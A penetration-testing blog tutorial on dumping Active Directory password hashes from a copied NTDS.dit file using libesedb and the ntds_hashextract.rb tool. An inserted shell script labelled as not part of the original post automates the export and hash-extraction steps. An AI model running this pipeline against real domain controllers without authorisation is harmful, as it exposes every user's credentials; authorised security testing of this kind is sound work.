Earlier this week I released a blog post on the Accuvant website explaining at a high level some of the techniques and use cases for my recently developed Metasploit modules. This article will be the first in a series of tutorials where I plan to do a deeper dive into the individual modules and some of their many uses during a penetration test.
The ntds_hashextract.rb script is a standalone tool that can be used to quickly and efficiently extract Active Directory user account password hashes from the exported datatable of an NTDS.dit database. As it turns out, exporting the datatable can sometimes be tricky, so here is a detailed tutorial covering the methodology that I use and continue to have success with.
Step 1 – Install Libesedb
Libesedb is an open source C library developed to forensically extract information from Extensible Storage Engine (ESE) database files. In order to get what we need out of NTDS.dit we will first have to download and install the library using the following URL
Next, we will need to extract the tarball, then configure, make and install the library from the command line.
- $ tar xvzf libesedb-alpha-20120102.tar.gz
- $ cd libesedb-20120102
- $ ./configure
- $ make && make install
This is what the finished output looked like for me after everything was done on a fresh copy of Backtrack 5.
Step 2 – Export Tables From NTDS.dit
Now that you have a working install of the Libesedb library, make sure you’ve got a proper copy of the NTDS.dit database as well as the SYSTEM registry hive file on your machine. In case you weren’t already aware, you can use another one of my modules, ntdsgrab.rb, to obtain these items from a Windows Domain Controller, provided you have proper credentials of course. Here is what they look like on my system after downloading them via the Metasploit Framework.
Change into whatever directory contains your loot, in my case the /tmp/NTDS_Grab directory, and run esedbexport from the libesedb/esedbtools directory against your NTDS.dit database. It will export all of the tables and store them in a newly created directory called ntds.export.
Step 3 – Dump All The Hashes
At this point you’re ready to run ntds_hashextract.rb against the datatable (Table #4) and the SYSTEM registry hive file in order to grab all of the domain password hashes. If the domain is large enough (several thousand unique users), the command might take a few minutes to finish on your system, so go grab a cup of coffee. When it’s done it should look something like this.
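The three steps above as one script, added here as an example and not part of the original post or the module itself. It assumes esedbexport is on PATH after make install, that ntds_hashextract.rb sits in the working directory and takes the datatable followed by the SYSTEM hive as its two arguments, and that esedbexport writes its output to ntds.export; the header check is there so a truncated or non-ESE copy of NTDS.dit fails fast instead of producing a confusing export error.

```shell
#!/bin/sh
# Added example (not the author's code): tutorial steps 2 and 3 as one
# script. Assumptions: esedbexport is on PATH, ntds_hashextract.rb is in the
# working directory and takes "<datatable> <SYSTEM>" as arguments, and the
# exported tables land in ntds.export as described in the tutorial.
set -eu

# An ESE database (NTDS.dit) starts with a 4-byte checksum followed by the
# signature bytes EF CD AB 89. Returns 0 when those bytes are present.
is_ese_db() {
    [ -f "$1" ] || return 1
    sig=$(dd if="$1" bs=1 skip=4 count=4 2>/dev/null | od -An -tx1 | tr -d ' \n')
    [ "$sig" = "efcdab89" ]
}

# Step 2: export every table from NTDS.dit into <loot_dir>/ntds.export
export_tables() {
    loot_dir=$1
    is_ese_db "$loot_dir/NTDS.dit" || { echo "NTDS.dit is not an ESE database" >&2; return 1; }
    [ -f "$loot_dir/SYSTEM" ] || { echo "SYSTEM hive is missing" >&2; return 1; }
    # -t sets the output basename; esedbexport appends ".export" (assumption)
    (cd "$loot_dir" && esedbexport -t ntds NTDS.dit)
}

# Step 3: run the extractor against the datatable (table #4) and SYSTEM.
dump_hashes() {
    loot_dir=$1
    datatable=$(ls "$loot_dir"/ntds.export/datatable.* | head -n 1)
    ruby ntds_hashextract.rb "$datatable" "$loot_dir/SYSTEM"
}

# Usage: ./ntds_pipeline.sh /tmp/NTDS_Grab
if [ -n "${1:-}" ]; then
    export_tables "$1"
    dump_hashes "$1"
fi
```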
That’s all for now, check back soon for more in this series.
Thanks for reading.